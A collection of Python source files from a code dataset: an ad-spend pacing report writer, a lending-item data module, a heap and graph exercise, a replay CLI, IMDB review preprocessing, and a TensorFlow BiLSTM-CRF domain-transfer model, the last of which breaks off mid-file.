'Media Cost'})\ndf2 = df2.rename(columns={'Budget Amount': 'Line Item Budget'})\ndf2 = df2.rename(columns={'Name': 'Line Item'})\n\nkeep_col_3 =['Line Item'\n ,'Media Cost']\n\nli = df.groupby(['Date','Line Item'], as_index=False).sum()\nli = li.loc[li['Date'] == str(date)]\nli = li[keep_col_3]\nli = li.rename(columns={'Media Cost': 'Spend Yesturday'})\nli = li.sort_values(['Spend Yesturday'], ascending=False)\nLI = df.groupby(['Line Item'], as_index=False).sum()\n\nLI = pd.merge(LI,df2, on =['Line Item'], how ='left')\nLI = pd.merge(LI,li, on=['Line Item'], how='left')\nLI = LI.rename(columns={'Frequency Exposures': 'LI Frequency'})\nLI = LI.rename(columns={'Bid Strategy Value': 'Bid Price'})\nLI = LI.append(LI.sum(numeric_only=True), ignore_index=True)\n\n#compute how many days remain and make add a new column to the dataframe\ndays_in = len(set(df['Date']))\ndays_left = days_total - days_in\nLI['Days Remaining'] = days_left\nLI['Budget Remaining'] = LI['Line Item Budget'] - LI['Media Cost']\nLI['Daily Spend Required'] = LI['Budget Remaining']/LI['Days Remaining']\nLI['Average Daily Spend'] = LI['Media Cost']/days_in\nLI['Average Daily Pace'] = LI['Average Daily Spend'] - LI['Daily Spend Required']\nLI['Yesturday Pace Deficit'] = LI['Spend Yesturday'] - LI['Daily Spend Required']\nLI = LI.sort_values(['Line Item Budget'], ascending=False)\n\nLI = LI[['Line Item',\t'Impressions',\t'Total Conversions',\t'Media Cost',\t'Line Item Budget',\t'LI Frequency',\t'Bid Price',\t'Days Remaining',\t'Budget Remaining','Spend Yesturday',\t'Daily Spend Required',\t'Average Daily Spend',\t'Average Daily Pace', 'Yesturday Pace Deficit']]\nLI.set_index('Line Item', inplace=True)\n\n\n#Output each dataframe to a seperate sheet in excel \nwriter = pd.ExcelWriter('/Users/apogee_tpaschke/Documents/FMJ_Daily_Pace/Daily_Pace'+day+'.xlsx', engine='xlsxwriter') \n#write each dataframe to a different worksheet \nLI.to_excel(writer, sheet_name='Pacing')\n\nworkbook = writer.book\nworksheet1=writer.sheets['Pacing']\nformat1 = workbook.add_format({'num_format': '#,##0'})\nformat2 = workbook.add_format({'num_format': '0.00%'}) \nformat3 = workbook.add_format({'num_format': '$#,##0.00'})\n\nworksheet1.set_column('A:A', 44, None)\nworksheet1.set_column('B:B', 12, format1)\nworksheet1.set_column('C:C', 16, format1)\nworksheet1.set_column('D:D', 12, format3)\nworksheet1.set_column('E:E', 15, format3)\nworksheet1.set_column('F:F', 10, format1)\nworksheet1.set_column('G:G', 8, format3)\nworksheet1.set_column('H:H', 12, format1)\nworksheet1.set_column('I:I', 15, format3)\nworksheet1.set_column('J:J', 17, format3)\nworksheet1.set_column('K:K', 17, format3)\nworksheet1.set_column('L:L', 17, format3)\nworksheet1.set_column('M:M', 17, format3)\nworksheet1.set_column('N:N', 17, format3)\n\nwriter.save()\n\n#print(LI)\n\n\n\n\n\n\n\n#df = df.drop(df.in","sub_path":"FJM_Pacing.py","file_name":"FJM_Pacing.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"14485576","text":"from scout.dao.space import get_spots_by_filter, _get_spot_filters, \\\n _get_extended_info_by_key\nimport copy\n\n\ndef get_item_by_id(item_id):\n spot = get_spots_by_filter([\n ('item:id', item_id),\n ('extended_info:app_type', 'tech')\n ])\n if spot:\n spot = _filter_spot_items(item_id, spot[0])\n return spot\n\n\ndef _filter_spot_items(item_id, spot):\n for item in spot.items:\n if item.item_id == item_id:\n spot.item = item\n return spot\n\n\ndef add_item_info(spot):\n for item in spot.items:\n item.model = _get_extended_info_by_key(\"i_model\",\n item.extended_info)\n item.brand = _get_extended_info_by_key(\"i_brand\",\n item.extended_info)\n item.checkout_period = _get_extended_info_by_key(\n \"i_checkout_period\",\n item.extended_info\n )\n item.has_access_restriction = _get_extended_info_by_key(\n \"i_has_access_restriction\",\n item.extended_info\n )\n item.access_limit_role = _get_extended_info_by_key(\n \"i_access_limit_role\",\n item.extended_info\n )\n item.access_role_students = _get_extended_info_by_key(\n \"i_access_role_students\",\n item.extended_info\n )\n item.reservation_required = _get_extended_info_by_key(\n \"i_reservation_required\",\n item.extended_info\n )\n item.is_active = _get_extended_info_by_key(\n \"i_is_active\",\n item.extended_info\n )\n item.quantity = _get_extended_info_by_key(\n \"i_quantity\",\n item.extended_info\n )\n item.description = _get_extended_info_by_key(\n \"i_description\",\n item.extended_info\n )\n item.reserve_url = _get_extended_info_by_key(\n \"i_reserve_url\",\n item.extended_info\n )\n item.manual_url = _get_extended_info_by_key(\n \"i_manual_url\",\n item.extended_info\n )\n return spot\n\n\ndef get_filtered_items(spots, request):\n parameter_list = _get_spot_filters(request)\n brand = []\n subcategory = []\n for param in parameter_list:\n if param[0] == \"item:extended_info:i_brand\":\n brand.append(param[1])\n elif param[0] == \"item:subcategory\":\n subcategory.append(param[1])\n\n if len(brand) <= 0 and len(subcategory) <= 0:\n return spots\n\n newSpots = []\n\n for spot in spots:\n newSpot = copy.deepcopy(spot)\n newSpot.items = []\n for item in spot.items:\n if item.subcategory in subcategory:\n newSpot.items.append(item)\n else:\n if item.brand in brand:\n newSpot.items.append(item)\n newSpots.append(newSpot)\n return newSpots\n\n\ndef get_item_count(spots):\n item_count = 0\n for spot in spots:\n item_count += len(spot.items)\n return item_count\n","sub_path":"scout/dao/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490226072","text":"import heapq\n\ndef solution(n, costs):\n answer = 0\n dis = [[] for _ in range(n)]\n \n for cost in costs:\n s, e, cnt = map(int, cost)\n dis[s].append([e, cnt])\n dis[e].append([s, cnt])\n \n def find(start):\n D = [[-1, 0x9999999] for _ in range(n)]\n\n D[start][0] = start\n D[start][1] = 0\n \n q = []\n heapq.heappush(q, (0, start))\n \n while q:\n now, cnt = heapq.heappop(q)\n if D[now][1] < cnt:\n continue\n for i in dis[now]:\n cost = i[1]\n \n if cost < D[i[0]][1]:\n D[i[0]][1] = cost\n D[i[0]][0] = now\n heapq.heappush(q, (cost, i[0]))\n \n print(D)\n return D\n \n D = find(0)\n for d in D:\n answer += d[1]\n \n return answer\n\n # heapq.heappush(heap, (-num, num)) # (우선 순위, 값)\n # heapq.heappop(heap)[1]) ","sub_path":"이혜은/0923/섬 연결하기(실패).py","file_name":"섬 연결하기(실패).py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32049637","text":"\"\"\"\r\n@author Gabriela Melo\r\n@since 21/05/2015\r\n\"\"\"\r\n\r\nclass MinHeap:\r\n\tdef __init__(self):\r\n\t\tself.count = 0\r\n\t\tself.array = [None]\r\n\r\n\tdef __len__(self):\r\n\t\treturn self.count\r\n\r\n\tdef is_empty(self):\r\n\t\t'''\r\n returns whether the amount of items in the heap is 0\r\n :return: boolean\r\n :complexity: O(1)\r\n '''\r\n\t\treturn self.count == 0\r\n\r\n\tdef append(self, item):\r\n\t\t'''\r\n adds a new item to the heap\r\n :param item: a list of any object type, except for item[0] which contains the key, that must be an integer\r\n :complexity: best = O(1), worst = O(log N), where N = depth of heap\r\n '''\r\n\t\ttry:\r\n\t\t\tint(item[0])\r\n\t\texcept ValueError:\r\n\t\t\tprint('Key needs to be an integer')\r\n\t\ttry:\r\n\t\t\tself.array[self.count+1] = item\r\n\t\texcept IndexError:\r\n\t\t\tself.array.append(item)\r\n\r\n\t\tself.count += 1\r\n\t\tself.rise(self.count)\r\n\r\n\tdef appendAtEnd(self, value):\r\n\t\tself.array.append[self.count+1] = [self.array[self.count][0]+1, value]\r\n\r\n\r\n\tdef rise(self, k):\r\n\t\t'''\r\n\t\tbrings item of key k to the position where it belongs\r\n\t\t:param k: integer, position of item\r\n\t\t:complexity: best = O(1), worst = O(log k)\r\n\t\t'''\r\n\t\twhile k//2 > 0:\r\n\t\t\tif self.array[k][0] >= self.array[k//2][0]:\r\n\t\t\t\tbreak\r\n\t\t\tself.swap(k, k//2)\r\n\t\t\tk = k//2\r\n\r\n\tdef swap(self, i, j):\r\n\t\t'''\r\n\t\tswaps two elements in an array\r\n\t\t:param i, j: integers, position of items to be swaped\r\n\t\t:complexity: O(1)\r\n\t\t'''\r\n\t\ttemp = self.array[i]\r\n\t\tself.array[i] = self.array[j]\r\n\t\tself.array[j] = temp \r\n\r\n\tdef __str__(self):\r\n\t\tstring = '' \r\n\t\tfor i in range(self.count):\r\n\t\t\tstring += str(self.array[i+1])\r\n\t\treturn string\r\n\r\n\tdef serve(self):\r\n\t\t'''\r\n\t\treturns item of smallest key in the heap\r\n\t\t:return: item of any type\r\n\t\t:complexity: best = O(1), worst = O(log N), where N = depth of heap\r\n\t\t'''\r\n\t\tassert not self.is_empty(), \"Can't serve from empty list\"\r\n\t\titem = self.array[1]\r\n\t\tself.swap(1, self.count)\r\n\t\tself.count -= 1\r\n\r\n\t\tself.sink()\r\n\t\treturn item\r\n\r\n\tdef sink(self):\r\n\t\t'''\r\n\t\tbrings item on top of heap to the position where it belongs\r\n\t\t:complexity: best = O(1), worst = O(log k)\r\n\t\t'''\r\n\t\tk = 1\r\n\t\twhile (k*2 <= self.count):\r\n\t\t\tchild = self.get_smallest_child(k)\r\n\t\t\tif self.array[k][0] < self.array[child][0]:\r\n\t\t\t\tbreak\t\r\n\t\t\tself.swap(k, child)\r\n\t\t\tk = child\r\n\r\n\tdef get_smallest_child(self, i):\r\n\t\t'''\r\n\t\tparam i: integer, position of node\r\n\t\treturn: integer, position of child with smallest key\r\n\t\tcomplexity: O(1)\r\n\t\t'''\r\n\t\ttry:\r\n\t\t\tassert (i*2+1)<=self.count\r\n\t\texcept AssertionError:\r\n\t\t\treturn i*2\r\n\t\tif self.array[i*2] < self.array[i*2+1]:\r\n\t\t\treturn i*2\r\n\t\telse:\r\n\t\t\treturn i*2+1\r\n\r\ndef menu():\r\n '''\r\n \r\n '''\r\n quit = False\r\n heap = MinHeap()\r\n while not quit:\r\n commands = [0, 1, 2, 3, 4]\r\n print(\r\n '''\r\n ---Binary Tree Class menu---\r\n Available commands:\r\n 1 \tapend \r\n 2 \tserve\r\n 3 \tprint\r\n 4 size\r\n 0 \tquit\r\n '''\r\n )\r\n\r\n command = input('Enter command: ')\r\n try:\r\n \tcommand = int(command)\r\n \tassert command in commands\r\n except (ValueError, AssertionError):\r\n print('Unknown command, try again')\r\n else:\r\n if command == 1:\r\n \titem = input('Enter item: ')\r\n \theap.append([item])\r\n elif command == 2:\r\n print(heap.serve())\r\n elif command == 3:\r\n print(str(heap))\r\n elif command == 4:\r\n print(len(heap))\r\n elif command == 0:\r\n quit = True\r\n\r\ndef main():\r\n\tmenu()\r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"minHeap.py","file_name":"minHeap.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78310472","text":"import sys\nimport os\nimport json\nimport utils\nimport activity\n\ndef main():\n if (len(sys.argv) <3):\n print(\"\")\n print(\"\")\n print('usage: python scanReplay.py ')\n print(\"\")\n print('...where command can be :')\n print(' show_activity # show what happens at each DP')\n sys.exit()\n replay_json_path = sys.argv[1]\n command = sys.argv[2]\n \n if os.path.exists(replay_json_path):\n if not utils.verify_path_is_replay_json(replay_json_path):\n print(\"replay json file not valid.\")\n sys.exit()\n if command == \"show_activity\":\n show_activity(replay_json_path)\n else:\n print(\"\")\n print(\"ERROR - subcommand \"+ command + \" not recognized.\")\n else:\n print(\"given file does not exist:\", replay_json_path)\n\ndef show_activity(replay_json_path):\n print(\"extracting game activity from replay json file\") \n fname = os.path.basename(replay_json_path)\n parts = fname.split(\".\")\n replay_name = parts[0]\n print(\"\")\n print(\"replay name : \" + replay_name)\n activity.show_activity_via_replay_json(replay_json_path)\n\n\nif __name__ == '__main__':\n main()","sub_path":"py/scanReplayJson.py","file_name":"scanReplayJson.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"474206867","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 15 08:52:33 2020\n\n@author: u3w1\n\"\"\"\n\n# https://ai.stanford.edu/~amaas/data/sentiment/\n# https://www.imdb.com/interfaces/\n\nimport os\nimport pandas as pd\nfrom requests import get\n\ndef get_id(s):\n url = s[26:35]\n return url\n\n#extrair dados básicos e de ratings dos filmes\ndef get_dataset(url_urls, url_basics, url_ratings, nm_basics, nm_file):\n \n urls = open(url_urls, 'r').read()\n urls_df = urls.split('\\n')\n urls_df = pd.DataFrame(urls_df, columns=['urls'])\n urls_df = urls_df.loc[urls_df.urls != '']\n urls_df['id'] = urls_df['urls'].apply(get_id)\n \n title_basics = pd.read_csv(url_basics, sep='\\t', header=0)\n title_ratings = pd.read_csv(url_ratings, sep='\\t', header=0)\n\n df_basics = urls_df.merge(title_basics, left_on='id', right_on='tconst')\n \n #verificar identificadores que não foram relacionados entre as bases\n erros = set(urls_df.id) - set(df_basics.id)\n \n DE, PARA = [], []\n for id_ in erros:\n url = 'http://www.imdb.com/title/' + id_\n response = get(url)\n index_new_id = response.text.find('app-argument')\n new_id = response.text[index_new_id + 27:index_new_id + 36]\n DE.append(id_)\n PARA.append(new_id)\n \n def get_new_id(s):\n try:\n list_index = DE.index(s)\n id_ = PARA[list_index]\n except:\n id_ = s \n return id_\n\n urls_df['id_new'] = urls_df['id'].apply(get_new_id)\n\n df_basics = urls_df.merge(title_basics, left_on='id_new', right_on='tconst', how='left')\n df_basics.to_csv('basics_' + nm_file + '.csv')\n \n df_ratings = urls_df.merge(title_ratings, left_on='id_new', right_on='tconst', how='left')\n df_ratings.to_csv('ratings_' + nm_file + '.csv')\n \n return df_basics, df_ratings\n\nget_dataset('./Desktop/Imdb datasets/aclImdb/train/urls_pos.txt',\n './Desktop/Imdb datasets/title_basics.tsv',\n './Desktop/Imdb datasets/title_ratings.tsv',\n 'test_negative')\n\nget_dataset('./Desktop/Imdb datasets/aclImdb/train/urls_neg.txt',\n './Desktop/Imdb datasets/title_basics.tsv',\n './Desktop/Imdb datasets/title_ratings.tsv',\n 'test_negative')\n\nget_dataset('./Desktop/Imdb datasets/aclImdb/test/urls_pos.txt',\n './Desktop/Imdb datasets/title_basics.tsv',\n './Desktop/Imdb datasets/title_ratings.tsv',\n 'test_negative')\n\nget_dataset('./Desktop/Imdb datasets/aclImdb/test/urls_neg.txt',\n './Desktop/Imdb datasets/title_basics.tsv',\n './Desktop/Imdb datasets/title_ratings.tsv',\n 'test_negative')\n\n#extrair dados de texto nos diretórios\ndef get_text(directory, nm_file):\n comments = pd.DataFrame()\n for filename in os.listdir(directory):\n # print(filename)\n if filename.endswith(\".txt\"):\n f = open(directory + '/' + filename, encoding=\"utf8\")\n lines = f.read()\n comments = comments.append({'index': filename.split('_')[0],\n 'sentiment': filename.split('_')[1].split('.')[0],\n 'text': lines}, ignore_index=True)\n continue\n else:\n continue\n \n comments['index'] = comments['index'].astype(int)\n comments = comments.set_index('index')\n comments.to_csv('text_' + nm_file + '.csv')\n \n return comments\n\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/train/pos', 'train_positive')\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/train/neg', 'train_negative')\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/test/pos', 'test_positive')\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/test/neg', 'test_negative')\n#get for unsupervised\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/train/unsup', 'train_unsup')\n\n#juntar features no mesmo dataframe\ndef join_features(nm_file):\n basics = pd.read_csv('basics_' + nm_file + '.csv', index_col=0)\n ratings = pd.read_csv('ratings_' + nm_file + '.csv', index_col=0)\n comments = pd.read_csv('text_' + nm_file + '.csv', index_col=0)\n\n df = comments.merge(basics, left_on=comments.index, right_on=basics.index)\n df = df.merge(ratings, left_on='key_0', right_on=ratings.index)\n\n df.to_csv(nm_file+ '.csv')\n \n return df\n\ndf_train_pos = join_features('train_positive')\ndf_train_neg = join_features('train_negative')\njoin_features('test_positive')\njoin_features('test_negative')\n\n#juntar dados negativos e positivos\ndef join_pos_neg(nm_file):\n pos = pd.read_csv(nm_file + '_positive.csv', index_col=0)\n neg = pd.read_csv(nm_file + '_negative.csv', index_col=0)\n \n df = pd.concat([pos, neg])\n df.reset_index(inplace=True)\n \n df.to_csv(nm_file + '.csv')\n \n return df\n\njoin_pos_neg('train')\njoin_pos_neg('test')\n\n#gerar todo o conteúdo texto para trainamento não supervisionado\ntrain_positive = pd.read_csv('text_train_positive.csv', index_col=0)\ntrain_negative = pd.read_csv('text_train_negative.csv', index_col=0)\ntrain_unsup = pd.read_csv('text_train_unsup.csv', index_col=0)\n\ntest_positive = pd.read_csv('text_test_positive.csv', index_col=0)\ntest_negative = pd.read_csv('text_test_negative.csv', index_col=0)\n\ntext_train = pd.concat([train_positive, train_negative, train_unsup])\ntext_train_labeled = pd.concat([train_positive, train_negative])\ntext_test = pd.concat([test_positive, test_negative])\n\ntext_train['text'] = text_train['text'].str.replace('
', '')\ntext_train_labeled['text'] = text_train_labeled['text'].str.replace('
', '')\ntext_test['text'] = text_test['text'].str.replace('
', '')\n\ntext_train['label'] = 'negative'\ntext_train.loc[text_train['sentiment']>5, 'label'] = 'positive'\ntext_train_labeled['label'] = 'negative'\ntext_train_labeled.loc[text_train['sentiment']>5, 'label'] = 'positive'\ntext_test['label'] = 'negative'\ntext_test.loc[text_test['sentiment']>5, 'label'] = 'positive'\n\ntext_train = text_train[['label', 'text']]\ntext_train['text'] = text_train['text'].astype(str)\ntext_train.to_csv('df_fastai.csv', index=False)\n\ntext_train_labeled = text_train_labeled[['label', 'text']]\ntext_train_labeled['text'] = text_train_labeled['text'].astype(str)\ntext_train_labeled.to_csv('text_train_labeled.csv', index=False)\n\ntext_test = text_test[['label', 'text']]\ntext_test['text'] = text_test['text'].astype(str)\ntext_test.to_csv('text_test.csv', index=False)\n","sub_path":"Imdb_preprocessing.py","file_name":"Imdb_preprocessing.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"552124705","text":"import openpyxl\n\nwb = openpyxl.load_workbook('text.xlsx')\nsheet = wb.active\n\nwith open('geust1.txt', 'w') as file1:\n for r in range(1, 6):\n file1.write(sheet.cell(row=r, column=1).value)\n\nmax_row = sheet.max_row\nwith open('dictionary1.txt', 'w') as file2:\n for r in range(1, max_row + 1):\n file2.write(sheet.cell(row=r, column=2).value)\n\nprint(\"Done!\")","sub_path":"AutomateTheBoringStuffWithPython/Ch12.WorkingWithExcelSpreadsheets/12.13.5_spreadsheetToTextFiles.py","file_name":"12.13.5_spreadsheetToTextFiles.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"456444200","text":"# encoding=utf-8\n# Project: transfer_cws\n# Author: xingjunjie\n# Create Time: 07/11/2017 11:04 AM on PyCharm\n\nimport tensorflow as tf\nfrom utils import Progbar\nfrom data_utils import pad_sequences, minibatches, get_chunks, minibatches_evaluate\nimport numpy as np\nimport os\nfrom functools import partial\nfrom penalty import MKL, CMD, MMD, gaussian_kernel_matrix, _de_pad\n\n\nclass Model(object):\n def __init__(self, args, ntags, nwords, ntarwords=None, src_embedding=None,\n target_embedding=None, logger=None, src_batch_size=None):\n self.args = args\n self.src_embedding = src_embedding\n self.target_embedding = target_embedding\n self.ntags = ntags\n self.nwords = nwords\n self.ntarwords = ntarwords\n self.logger = logger\n self.init_lr = args.learning_rate\n self.src_batch_size = src_batch_size\n self.target_batch_size = self.args.batch_size - self.src_batch_size\n\n self.describe = \"shared lstm only, with mmd, model-2\"\n\n self.initializer = tf.contrib.layers.xavier_initializer()\n self.l2_regularizer = tf.contrib.layers.l2_regularizer(self.args.l2_ratio)\n\n self.info = {\n 'dev': [],\n 'train': [],\n 'loss': [],\n 'test': None\n }\n\n def add_placeholder(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n self.batch_size = tf.placeholder(tf.int32, shape=[])\n\n # shape = [batch size, max length of sequence in batch]\n self.src_word_ids = tf.placeholder(tf.int32, shape=[None, None])\n\n # shape = [batch size, max length of sequence in batch]\n self.target_word_ids = tf.placeholder(tf.int32, shape=[None, None])\n\n # shape = [batch size]\n self.sequence_lengths = tf.placeholder(tf.int32, shape=[None])\n\n # shape = [batch size]\n self.src_sequence_lengths = tf.placeholder(tf.int32, shape=[None])\n\n # shape = [batch size]\n self.target_sequence_lengths = tf.placeholder(tf.int32, shape=[None])\n\n # shape = [batch size, max length of sequence in batch]\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n\n # hyper parameters\n self.dropout = tf.placeholder(tf.float32, shape=[])\n\n self.lr = tf.placeholder(tf.float32, shape=[])\n\n self.is_training = tf.placeholder(tf.bool)\n\n def get_feed_dict(self, sentences, labels, target_words, lr=None, dropout=None, src_batch_size=None, mode=\"all\",\n is_training=True):\n if mode == 'all':\n all_words_ids, sequence_lengths = pad_sequences(sentences + target_words, pad_tok=0)\n\n words_ids = all_words_ids[:src_batch_size] + [[0] * len(all_words_ids[0])] * (\n self.args.batch_size - src_batch_size)\n src_sequence_lengths = sequence_lengths[:src_batch_size] + [0] * (self.args.batch_size - src_batch_size)\n target_words_ids = [[0] * len(all_words_ids[0])] * src_batch_size + all_words_ids[src_batch_size:]\n target_sequence_lengths = [0] * src_batch_size + sequence_lengths[src_batch_size:]\n\n feed_dict = {\n self.src_word_ids: words_ids,\n self.src_sequence_lengths: src_sequence_lengths,\n self.target_word_ids: target_words_ids,\n self.target_sequence_lengths: target_sequence_lengths,\n self.sequence_lengths: sequence_lengths,\n self.batch_size: self.args.batch_size,\n self.is_training: is_training,\n }\n elif mode == 'target':\n target_words_ids, target_sequence_lengths = pad_sequences(target_words, pad_tok=0)\n sequence_lengths = target_sequence_lengths\n feed_dict = {\n self.src_word_ids: np.zeros_like(target_words_ids),\n self.src_sequence_lengths: np.zeros_like(target_sequence_lengths),\n self.target_word_ids: target_words_ids,\n self.target_sequence_lengths: target_sequence_lengths,\n self.sequence_lengths: target_sequence_lengths,\n self.batch_size: self.args.batch_size,\n self.is_training: is_training,\n }\n\n if labels is not None:\n labels, _ = pad_sequences(labels, 0)\n feed_dict[self.labels] = labels\n\n if lr is not None:\n feed_dict[self.lr] = lr\n\n if dropout is not None:\n feed_dict[self.dropout] = dropout\n\n return feed_dict, sequence_lengths\n\n def add_src_word_embeddings_op(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n with tf.variable_scope(\"src_word\"):\n _word_embeddings = tf.get_variable('embedding', shape=[self.nwords, self.args.embedding_size],\n initializer=self.initializer,\n trainable=not self.args.disable_src_embed_training,\n regularizer=self.l2_regularizer)\n word_embeddings = tf.nn.embedding_lookup(_word_embeddings, self.src_word_ids)\n\n if self.args.share_embed:\n target_word_embeddings = tf.nn.embedding_lookup(_word_embeddings, self.target_word_ids)\n self.target_word_embeddings = tf.nn.dropout(target_word_embeddings, self.dropout)\n\n self.src_word_embeddings = tf.nn.dropout(word_embeddings, self.dropout)\n\n def add_target_word_embeddings_op(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n with tf.variable_scope(\"target_word\"):\n _word_embeddings = tf.get_variable('embedding', shape=[self.ntarwords, self.args.embedding_size],\n initializer=self.initializer, regularizer=self.l2_regularizer)\n word_embeddings = tf.nn.embedding_lookup(_word_embeddings, self.target_word_ids)\n\n if self.args.use_pretrain_target:\n pre_train_size = self.target_embedding.shape[0]\n self.target_embedding_init = _word_embeddings[:pre_train_size].assign(self.target_embedding)\n\n self.target_word_embeddings = tf.nn.dropout(word_embeddings, self.dropout)\n\n def add_shared_lstm(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n with tf.variable_scope('lstm'):\n cell_fw = tf.contrib.rnn.LSTMCell(self.args.lstm_hidden)\n cell_bw = tf.contrib.rnn.LSTMCell(self.args.lstm_hidden)\n (output_fw, output_bw), _ = tf.nn.bidirectional_dynamic_rnn(\n cell_fw, cell_bw, self.src_word_embeddings, sequence_length=self.src_sequence_lengths,\n dtype=tf.float32)\n outout = tf.concat([output_fw, output_bw], axis=-1)\n self.src_after_shared = tf.nn.dropout(outout, self.dropout)\n\n (e_output_fw, e_output_bw), _ = tf.nn.bidirectional_dynamic_rnn(\n cell_fw, cell_bw, self.target_word_embeddings, sequence_length=self.target_sequence_lengths,\n dtype=tf.float32)\n e_outout = tf.concat([e_output_fw, e_output_bw], axis=-1)\n self.target_after_shared = tf.nn.dropout(e_outout, self.dropout)\n\n with tf.variable_scope('lstm_linear'):\n W = tf.get_variable(\"W\", shape=[2 * self.args.lstm_hidden, self.ntags],\n dtype=tf.float32, initializer=self.initializer, regularizer=self.l2_regularizer)\n b = tf.get_variable(\"b\", shape=[self.ntags], dtype=tf.float32,\n initializer=self.initializer, regularizer=self.l2_regularizer)\n ntime_steps = tf.shape(self.src_after_shared)[1]\n output = tf.reshape(self.src_after_shared, [-1, 2 * self.args.lstm_hidden])\n pred = tf.matmul(output, W) + b\n self.src_logits = tf.reshape(pred, [-1, ntime_steps, self.ntags])\n\n ntime_steps = tf.shape(self.target_after_shared)[1]\n output = tf.reshape(self.target_after_shared, [-1, 2 * self.args.lstm_hidden])\n pred = tf.matmul(output, W) + b\n self.target_logits = tf.reshape(pred, [-1, ntime_steps, self.ntags])\n\n def add_loss_op(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n # CRF loss\n with tf.variable_scope('src_crf'):\n self.src_log_likelihood, self.src_transition_params = tf.contrib.crf.crf_log_likelihood(\n self.src_logits, self.labels, self.src_sequence_lengths\n )\n\n with tf.variable_scope('target_crf'):\n self.target_log_likelihood, self.target_transition_params = tf.contrib.crf.crf_log_likelihood(\n self.target_logits, self.labels, self.target_sequence_lengths\n )\n self.src_crf_loss = tf.reduce_mean(-self.src_log_likelihood[:self.src_batch_size])\n self.target_crf_loss = tf.reduce_mean(-self.target_log_likelihood[self.src_batch_size:])\n\n # MMD loss\n if self.args.penalty_ratio > 0:\n self.src_depad = _de_pad(self.src_after_shared, self.src_sequence_lengths)\n self.target_depad = _de_pad(self.target_after_shared, self.target_sequence_lengths)\n\n if self.args.penalty == 'mmd':\n with tf.name_scope('mmd'):\n sigmas = [1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 5, 10, 15, 20, 25, 30, 35, 100, 1e3, 1e4, 1e5,\n 1e6]\n gaussian_kernel = partial(gaussian_kernel_matrix, sigmas=tf.constant(sigmas))\n loss_value = MMD(self.src_depad, self.target_depad, kernel=gaussian_kernel)\n mmd_loss = tf.maximum(1e-4, loss_value)\n\n self.penalty_loss = self.args.penalty_ratio * mmd_loss\n elif self.args.penalty == 'kl':\n self.src_depad_sm = tf.nn.softmax(self.src_depad)\n self.target_depad_sm = tf.nn.softmax(self.target_depad)\n self.kl_loss = MKL(self.src_depad_sm, self.target_depad_sm)\n self.penalty_loss = self.args.penalty_ratio * self.kl_loss\n elif self.args.penalty == 'cmd':\n self.cmd_loss = CMD(self.src_depad, self.target_depad, 5)\n self.penalty_loss = self.args.penalty_ratio * self.cmd_loss\n else:\n self.logger.critical(\"Penalty Type Invalid.\")\n\n temp = self.src_crf_loss + self.target_crf_loss + self.penalty_loss\n else:\n temp = self.src_crf_loss + self.target_crf_loss\n\n if self.args.use_l2:\n self.l2_loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n temp1 = temp + self.l2_loss\n else:\n temp1 = temp\n\n if not self.args.share_crf:\n self.crf_l2_loss = tf.nn.l2_loss(\n self.target_transition_params - self.src_transition_params) * self.args.crf_l2_ratio\n temp2 = temp1 + self.crf_l2_loss\n else:\n temp2 = temp1\n\n self.loss = temp2\n\n def add_train_op(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n with tf.variable_scope('train'):\n if self.args.optim.lower() == 'adam':\n optimizer = tf.train.AdamOptimizer(self.lr)\n elif self.args.optim.lower() == 'sgd':\n optimizer = tf.train.GradientDescentOptimizer(self.lr)\n else:\n raise NotImplementedError(\"Unknown optim {}\".format(self.args.optim))\n\n self.train_op = optimizer.minimize(self.loss)\n\n def add_init_op(self):\n self.init = tf.global_variables_initializer()\n\n def build(self):\n self.add_placeholder()\n self.add_src_word_embeddings_op()\n if not self.args.share_embed:\n self.add_target_word_embeddings_op()\n self.add_shared_lstm()\n self.add_loss_op()\n self.add_train_op()\n self.add_init_op()\n self.logger.critical(\"Model info: {}\".format(self.describe))\n\n def predict_batch(self, sess, words=None, target_words=None, mode='target', is_training=True):\n feed_dict, sequence_lengths = self.get_feed_dict(words, None, target_words=target_words, dropout=1.0, mode=mode,\n is_training=is_training)\n\n viterbi_sequences = []\n logits, transition_params = sess.run([self.target_logits, self.target_transition_params],\n feed_dict=feed_dict)\n for logit, sequence_length in zip(logits, sequence_lengths):\n logit = logit[:sequence_length]\n viterbi_sequence, viterbi_score = tf.contrib.crf.viterbi_decode(\n logit, transition_params\n )\n viterbi_sequences += [viterbi_sequence]\n\n return viterbi_sequences, sequence_lengths\n\n def run_epoch(self, sess, src_train, src_dev, tags, target_train, target_dev, n_epoch_noimprove):\n nbatces = (len(target_train) + self.target_batch_size - 1) // self.target_batch_size\n prog = 